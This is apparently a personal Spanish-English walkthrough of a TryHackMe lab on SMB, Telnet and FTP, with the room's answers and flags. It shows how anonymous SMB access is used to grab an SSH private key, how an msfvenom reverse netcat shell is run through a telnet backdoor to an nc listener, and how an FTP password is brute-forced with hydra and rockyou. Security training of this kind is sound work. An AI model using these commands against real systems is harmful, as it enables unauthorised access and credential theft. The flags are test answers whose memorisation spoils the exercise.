Network Service - CesarAlvarez2025/TryHackMe GitHub Wiki

Task 1 - Get Connected

En esta tarea nos da la bienvenida y nos dice que esta sala se exploraran las vulnerabilidades comunes de los servicios de Red y configuraciones erróneas

Task 2 - Understanding SMB

Nos explica que es samba y cómo funciona

What does SMB stand for?

Server Message Block

What type of protocol is SMB?

Response-request

What protocol suite do clients use to connect to the server?

TCP/IP

What systems does Samba run on?

Unix

Task 3 - Enumerating SMB

Conduct an nmap scan of your choosing, How many ports are open?

3

What ports is SMB running on? Provide the ports in ascending order.

139/445

What ports is SMB running on? Provide the ports in ascending order.

WORKGROUP

What comes up as the name of the machine?

POLOSMB

What operating system version is running?

6.1

What operating system version is running?

Profiles

Task 4 - Exploiting SMB

Nos enseña a explotar samba con el comando:

smbclient //[IP]/[SHARE] -U [USERNAME] -p [PORT]

Example: smbclient //10.10.10.10/secrets -U Anonymous -p 445

en este caso la carpeta secrets con el usuario anónimo

What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?

smbclient //10.10.10.2/secret -U suit -p 445

Acá elegimos la carpeta .shh. Y listamos lo importante

Does the share allow anonymous access? Y/N?

Y

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

John Cactus

What service has been configured to allow him to work from home?

Ssh

Okay! Now we know this, what directory on the share should we look in?

.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

id_rsa

Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

THM{smb_is_fun_eh?}

Task 5 - Understanding Telnet

Nos enseña que es el servicio Telnet y lo diferencia de SSH que van encriptado los datos

Is Telnet a client-server protocol (Y/N)?

Y

Is Telnet a client-server protocol (Y/N)?

SSH

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

telnet 10.10.10.3 23

The lack of what, means that all Telnet communication is in plaintext?

encryption

Task 6 - Enumerating Telnet

How many ports are open on the target machine? Note: you may need to scan non-standard ports too.

1

What port is this?

8012

This port is unassigned, but still lists the protocol it's using, what protocol is this?

Tcp

This port is unassigned, but still lists the protocol it's using, what protocol is this?

0

Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

No answer needed

Based on the title returned to us, what do we think this port could be used for?

a backdoor

Who could it belong to? Gathering possible usernames is an important step in enumeration.

Skidy

Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

No answer needed

Task 7- Exploiting Telnet

Nos explica como explotar un telnet con reverse shell y usando netcat

Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

No answer needed

Great! It's an open telnet connection! What welcome message do we receive?

SKIDY'S BACKDOOR.

Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

N

Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.

No answer needed

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

No answer needed

Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

Y

Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!

No answer needed

We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:

"msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

-p = payload

lhost = our local host IP address (this is your machine's IP address)

lport = the port to listen on (this is the port on your machine)

R = export the payload in raw format

What word does the generated payload start with?

Mkfifo

Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

"nc -lvnp [listening port]"

What would the command look like for the listening port we selected in our payload?

nc -lvnp 4444

Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!

No answer needed

Success! What is the contents of flag.txt?

THM{y0u_g0t_th3_t3ln3t_fl4g}

Task 8- Understanding FTP

Nos explica que es FTP y los dos modos activo y pasivo la diferencia

Answer the questions below

What communications model does FTP use?

client-server

What's the standard FTP port?

21

How many modes of FTP connection are there?

2(Pasivo y Activo)

Task 9 - Enumerating FTP

Run an nmap scan of your choice.

How many ports are open on the target machine?

3

What port is ftp running on?

21

What variant of FTP is running on it?

Para encontrar la varianteVsftpd corremos el comando nmap 10.10.176.245 -p21 -sV

10.10.176.245

-p21 puerto 21

.-sV para obtener información del servicio corriendo en el puerto 21

Great, now we know what type of FTP server we're dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing "ftp [IP]" into the console, and entering "anonymous", and no password when prompted.

What is the name of the file in the anonymous FTP directory?

Para ello nos conectamos el servidor con el comando ftp ip 10.10 1.76.254 con el usuario anónimo sin contraseña luego con el comando ls podemos listar los archivos y encontramos el archivo PUBLIC_NOTICE.txt

What do we think a possible username could be?

mike

El posible usuario para conectarse seria viendo que hay en el archivo para ellos lo bajamos con el comando get a la maquina nuestra. Y luego lo abrimos con el comando MORE

Task 10-Exploiting FTP

Nos explica que una de las formas de explotar el servicio ftp seria conociendo el usuario o averiguando el mismo y luego hacer fuerza bruta de la contraseña

Method Breakdown

So, from our enumeration stage, we know:

- There is an FTP server running on this machine

- We have a possible username

Using this information, let's try and bruteforce the password of the FTP Server.

What is the password for the user "mike"?

Password

Ejecutamos el comando hydra con su flag

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.222.28 ftp

-t 4 son los hilos

-l mike nonbre de usuario

-P /usr/share/wordlists/rockyou.txt diccionario a usar

-vV El modo verbose a muy verboso, muestra la combinación de login-pass para cada intento

-10.10.222.28 IP del Servidor Ftp

-ftp protocolo

Bingo! Now, let's connect to the FTP server as this user using "ftp [IP]" and entering the credentials when prompted

Nos logeamos al ftp con el comando ftp 10.10.222.28 21 ponemos el usuario mike y la contraseña anteriormente encontrada al conectarse al servidor hacemos uso del comando ls para ver los archivos de las carpetas. Luego bajamos el archivo ftp.txt a nuestra PC.

What is ftp.txt?

Por ultimo con el comando cat archivo fpt.txt abrimos el archivo y leemos su contenido

THM{y0u_g0t_th3_ftp_fl4g}